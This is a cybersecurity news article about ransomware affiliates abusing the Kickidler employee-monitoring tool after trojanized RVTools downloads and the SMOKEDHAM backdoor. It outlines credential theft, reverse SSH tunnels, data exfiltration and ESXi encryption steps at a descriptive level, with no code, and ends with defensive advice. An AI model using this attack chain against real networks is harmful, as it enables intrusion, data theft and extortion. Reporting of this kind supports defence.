Sophisticated ransomware operations are exploiting the legitimate employee monitoring software Kickidler, transforming it from a workplace oversight tool into a potent espionage platform for deep network infiltration and credential theft.
Cybersecurity experts have recently detailed how affiliates of notorious ransomware groups, including Qilin and Hunters International, deploy Kickidler following initial breaches.
This abuse allows attackers to meticulously track user activity, capture keystrokes, record screen actions, and ultimately harvest sensitive information critical for escalating their attacks, particularly against valuable VMware ESXi environments. The findings, corroborated by multiple security news outlets in early May 2025, underscore a dangerous trend where trusted internal tools are subverted to bypass security measures.
Fake Download Sites Spread Trojanized Versions of Kickidler
The pathway into corporate networks often begins with a deceptive tactic targeting IT administrators: Search Engine Optimization (SEO) poisoning. Attackers craft malicious websites, such as the fake RVTools download site, and promote them in search engine results.
An unsuspecting administrator downloading what appears to be a legitimate IT management utility like RVTools instead receives a trojanized version. This malicious installer then typically deploys the SMOKEDHAM PowerShell .NET backdoor, which subsequently installs Kickidler. This method is particularly insidious as it leverages the high privileges often associated with administrator accounts.
The strategic value of Kickidler for these threat actors is significant. Varonis explained that the software enables attackers to overcome defenses like decoupled backup system authentication:
“Kickidler addresses this issue by capturing keystrokes and web pages from an administrator’s workstation. This enables attackers to identify off-site cloud backups and obtain the necessary passwords to access them. This is done without dumping memory or other high-risk tactics that are more likely to be detected.”
This capability is achieved without resorting to more easily detectable methods like memory dumping. The ultimate objective is frequently the encryption of critical infrastructure, leading to widespread operational disruption and substantial financial demands.
Attackers Exploit Legitimate Tools for Deep Network Access
The detailed mechanics of these attacks, as outlined by Varonis Threat Labs reveal a patient and methodical approach. Once the SMOKEDHAM backdoor provides an initial foothold, attackers execute reconnaissance commands (like `whoami`, `systeminfo`, `nslookup`) and exfiltrate this data to an attacker-controlled AWS EC2 instance. It is at this stage that Kickidler, often disguised under a name like ‘grabber.exe’, is deployed. Varonis theorizes that a subsequent period of inactivity, sometimes lasting several days, is likely dedicated to extensive credential harvesting through Kickidler’s monitoring capabilities.
Lateral movement across the victim’s network is then pursued using common IT tools such as Remote Desktop Protocol (RDP) and PsExec. In some instances, attackers have deployed KiTTY, a fork of the PuTTY SSH client, to establish reverse RDP tunnels over SSH to their EC2 infrastructure, frequently masking this malicious traffic over port 443 to evade basic firewall detection.
As an additional persistence or command-and-control (C2) mechanism, Remote Monitoring and Management (RMM) software like AnyDesk has also been observed. Data exfiltration is a key step before encryption; in the Varonis case study, attackers used WinSCP to steal nearly a terabyte of data. Kickidler’s legitimate features, used by over 5,000 organizations according to its developer, are twisted for stealthy reconnaissance.
Hunters International and the Targeting of VMware Infrastructure
Synacktiv’s research, notably published earlier on March 5, 2025, provided an in-depth look at a Hunters International ransomware operation employing these very Tactics, Techniques, and Procedures (TTPs). Hunters International, which emerged around October 2023 after reportedly acquiring assets from the dismantled Hive ransomware group, was observed using a trojanized RVTools installer to deliver the SMOKEDHAM backdoor. Synacktiv linked SMOKEDHAM to the UNC2465 threat actor, an affiliate previously associated with the Lockbit and Darkside ransomware operations.
Following the backdoor, Kickidler (referred to by Synacktiv as ‘Grabber’ and installed via `grem.msi`) was used for weeks to spy on an administrator. Synacktiv researchers highlighted the novelty of this approach, stating, “This is the first time we see such legitimate tool employed by attackers.” BleepingComputer reported in August 2024 on the group disseminating the SharpRhino RAT via typosquatting sites.
The compromise of VMware ESXi hypervisors is a primary goal for these attackers. Synacktiv detailed the use of a PowerShell script that leveraged VMware PowerCLI and WinSCP Automation to deploy a Rust-based ESXi encryptor.
This script automated connecting to vCenter, enabling the SSH service on ESXi hosts, and then using WinSCP to transfer and execute the ransomware. A critical step involved disabling ESXi’s integrity checks for executable files. The ransomware itself, which featured a terminal user interface, was often set for delayed execution.
It would stop virtual machines, encrypt their files (targeting extensions like .vmx, .vmdk, .vmsn), and then attempt to overwrite free disk space to hinder recovery. Unusually, this specific ESXi encryptor did not leave a ransom note on the affected systems.
The Wider Perils of Monitoring Software and Defensive Postures
The malicious exploitation of Kickidler occurs against a backdrop of broader concerns regarding workplace surveillance technologies. While the current incidents involve active weaponization by external threat actors, the inherent risks of monitoring software were highlighted in an accidental leak concerning the WorkComposer application.
That case involved the accidental exposure of over 21 million employee screenshots due to an improperly secured Amazon S3 bucket—a reminder of the sensitive data these tools handle, even without malicious interference. WorkComposer’s own terms and conditions attempt to disclaim liability for such internet security breaches.
The abuse of legitimate Remote Monitoring and Management (RMM) tools is a persistent threat recognized by cybersecurity authorities. A joint advisory from CISA, the NSA, and MS-ISAC in January 2023 specifically warned about attackers deceiving victims into installing portable remote desktop software.
To combat these evolving threats, security experts advocate for a multi-layered “Defense in Depth” approach. Key recommendations include comprehensive audits of all remote access tools, the implementation of strict application controls to prevent the execution of unauthorized RMM software, the enforcement of policies mandating only approved remote access solutions (such as VPNs or VDIs), and the proactive blocking of inbound and outbound connections on common RMM ports and protocols unless explicitly required for legitimate operations.
Varonis, for instance, stresses the importance of securing all seven layers of cybersecurity, from the human element through to critical data infrastructure.
